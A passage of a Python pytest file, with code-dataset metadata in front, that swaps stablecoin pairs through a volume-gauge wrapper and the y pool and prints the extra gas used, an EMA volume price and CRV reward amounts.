unittest.main() | 51.945055 | 91 | 0.707849 | 573 | 4,727 | 5.762653 | 0.08726 | 0.281647 | 0.327983 | 0.347668 | 0.904906 | 0.88825 | 0.876136 | 0.839491 | 0.824652 | 0.768322 | 0 | 0.021026 | 0.154855 | 4,727 | 91 | 92 | 51.945055 | 0.805507 | 0 | 0 | 0.45 | 0 | 0 | 0.020699 | 0 | 0 | 0 | 0 | 0 | 0.775 | 1 | 0.0375 | false | 0 | 0.0375 | 0 | 0.0875 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
eef6dfb30ece9f35d700ee0a24cc87479966cc66 | 35,587 | py | Python | tests/test_03_yvolgauge.py | taariq/volumegauge | f92ea90f4eefab9079fd624bddbe0e3cf5684f80 | [
"Apache-2.0"
] | 3 | 2020-12-17T01:11:08.000Z | 2020-12-24T08:06:07.000Z | tests/test_03_yvolgauge.py | taariq/volumegauge | f92ea90f4eefab9079fd624bddbe0e3cf5684f80 | [
"Apache-2.0"
] | 13 | 2020-11-22T20:24:23.000Z | 2021-01-07T20:19:57.000Z | tests/test_03_yvolgauge.py | taariq/volumegauge | f92ea90f4eefab9079fd624bddbe0e3cf5684f80 | [
"Apache-2.0"
] | 3 | 2020-12-17T18:32:46.000Z | 2020-12-23T21:57:47.000Z | #!/usr/bin/python3
import pytest
PERIOD = 30
DENOMINATOR = 10 ** 18
SMOOTHING = 2
ALPHA = DENOMINATOR - SMOOTHING * DENOMINATOR / (PERIOD + 1)
def test_exchange_ydai_to_yusdc(_yvolgauge, ypool, yDAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yDAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yDAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdc_to_ydai(_yvolgauge, ypool, yUSDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ydai_to_yusdt(_yvolgauge, ypool, yDAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yDAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yDAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdt_to_ydai(_yvolgauge, ypool, yUSDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ydai_to_ytusd(_yvolgauge, ypool, yDAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yDAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yDAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ytusd_to_ydai(_yvolgauge, ypool, yTUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yTUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yTUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdc_to_yusdt(_yvolgauge, ypool, yUSDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdt_to_yusdc(_yvolgauge, ypool, yUSDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdc_to_ytusd(_yvolgauge, ypool, yUSDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ytusd_to_yusdc(_yvolgauge, ypool, yTUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yTUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yTUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdt_to_ytusd(_yvolgauge, ypool, yUSDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(2, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(2, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ytusd_to_yusdt(_yvolgauge, ypool, yTUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange(3, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange(3, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yTUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yTUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_usdc(_yvolgauge, ypool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_dai(_yvolgauge, ypool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_usdt(_yvolgauge, ypool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_dai(_yvolgauge, ypool, USDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_tusd(_yvolgauge, ypool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_tusd_to_dai(_yvolgauge, ypool, TUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(TUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(TUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_usdt(_yvolgauge, ypool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_usdc(_yvolgauge, ypool, USDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_tusd(_yvolgauge, ypool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
